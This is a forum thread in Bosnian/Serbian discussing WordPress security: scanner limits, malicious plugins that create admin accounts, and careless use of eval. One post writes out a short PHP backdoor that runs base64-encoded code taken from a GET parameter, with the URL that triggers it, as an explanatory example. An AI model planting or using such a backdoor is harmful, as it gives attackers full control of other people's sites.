banjalukaforum.com

Dobrodošli na banjalukaforum.com
Danas je 13 Avg 2025, 14:04

Sva vremena su u UTC [ DST ]

Započni novu temu Odgovori na temu  [ 26 Posta ]  Idi na stranicu Prethodni  1, 2
Autoru Poruka
 Tema posta: Re: Wordpress
PostPoslato: 28 Mar 2018, 11:50 
Administrator
Korisnikov avatar

Pridružio se: 15 Nov 2002, 13:51
Ispostavilo se da nije nikakva zaraza u pitanju nego je neka antispam aplikacija blokirala pristup sajtu. Kad je ona isključena pristupanje je normalno.

Vrh

PostPoslato: 31 Mar 2018, 10:14 
Samo jedan iznad mene
Samo jedan iznad mene
Korisnikov avatar

Pridružio se: 10 Jun 2011, 21:22
Sehxor je napisao:
Sukuri nista ne znaci, ja sam vidjao plugine koji podmetnu regularnu funkciju "wp_create_user" i onda posalju wp-admin adresu preko "wp_remote_get", a pritom ne koriste ni eval ni base64_encode, tako da sukuri nista ne pronadje, nego moras kopati rucno :)

Добро, али то није инфекција него "бекдор" што свакако не значи да Сукури не требе користити уопште. Само треба да се има у виду да извјештај не мора да буде 100% тачан. :)

Vladimir RUS je napisao:
Na RTRS-u kazu 8000, a na Nezavisnim hiljade. :D
Dok je bilo uzivo, na RTRS-u i ATV-u nista. Zato ide live kada se otvara hidroelektrana od 42 miliona KM koja uz to zaposljava tj. bice uposleno 40-ak radnika. Milion KM po radnom mjestu.

Vrh

PostPoslato: 31 Mar 2018, 11:52 
Stara kuka
Stara kuka
Korisnikov avatar

Pridružio se: 18 Jul 2009, 18:07
Tesko je klasifikovati vise sta je backdoor a sta infekcija, uglavnom oboje dovode do neke vrste infekcije. Imas recimo plugine koji ljudi instaliraju koji nisu namjerno "backdoor-ovani", nego jednostavnije lose kodirani pa neko ih analizira i nadje exploit. Vidjao sam gomilu plugina koji iz nekog razloga koriste "eval" tamo gdje ocigledno nije potreban, a u pitanju je user input, ne znam da li su lijeni ili glupi jednostavno.

Na primjer vidjao sam plugin koji dodaje opciju pokretanja php-a kroz neko custom polje (a ima ih gomila takvih), snimi u bazu code kao string i onda je odatle vuce kroz "eval($dboutput)", a da stvar bude jos gora naprave tako da mozes i _GET parametar uraditi.

Dok drugi koriste klasican backdoor npr:

if($_GET['nesto'] === 'OK') {
eval(base64_decode($_GET['param']));
}

I kako prosjecan WP korisnik i kad mu sucuri izbaci mozda upozorenje da zna da li je pravi code ili nije, a dovoljno je samo uraditi http[s]://nekisajt.com/?nesto=OK&param=base64encstring i mozes raditi sta hoces.

Zakljucak je da je wp siguran samo onoliko koliko ga korisnik poznaje, core je sasvim siguran iako ima gomila spageta koda u njemu, gomila spageta funkcija koje idu u nedogled, bolje bi im bilo da prepisu cijeli core na full OOP umjesto samo db query-a i stave LTS verziju 5.0 i idu dalje sa novim sistemom.

Poslednji put menjao Piro dana 31 Mar 2018, 12:07, izmenjena 2 puta

Vrh

PostPoslato: 31 Mar 2018, 12:02 
Samo jedan iznad mene
Samo jedan iznad mene
Korisnikov avatar

Има негдје статистика о узроцима упада у Вордпрес и додаци (да не кажем плагини) су далеко највећи узрок. Значи генерално, што мање додатака - то боље. :) Само језгро Вордпреса је сад већ прилично безбједно.

Vladimir RUS je napisao:
Dok je bilo uzivo, na RTRS-u i ATV-u nista. Zato ide live kada se otvara hidroelektrana od 42 miliona KM koja uz to zaposljava tj. bice uposleno 40-ak radnika. Milion KM po radnom mjestu.

Vrh

PostPoslato: 31 Mar 2018, 12:05 
Stara kuka
Stara kuka
Korisnikov avatar

Pridružio se: 18 Jul 2009, 18:07
Po meni je drupal svjetlosnim godinama ispred WP-a sto se tice sigurnosti, a radim vec dugo kao bd na oba :)

Vrh

PostPoslato: 31 Mar 2018, 12:11 
Samo jedan iznad mene
Samo jedan iznad mene
Korisnikov avatar

Може бити, ниЈЕсам упознат, али код Друпала су усрали ствар тиме што свако мало због нове верзије кречиш поново, и додатке и бекенд и како се шта подешава и штајазнам...

Vladimir RUS je napisao:

Vrh

Prikaži postove u poslednjih:  Poređaj po  
Započni novu temu Odgovori na temu  [ 26 Posta ]  Idi na stranicu Prethodni  1, 2

Sva vremena su u UTC [ DST ]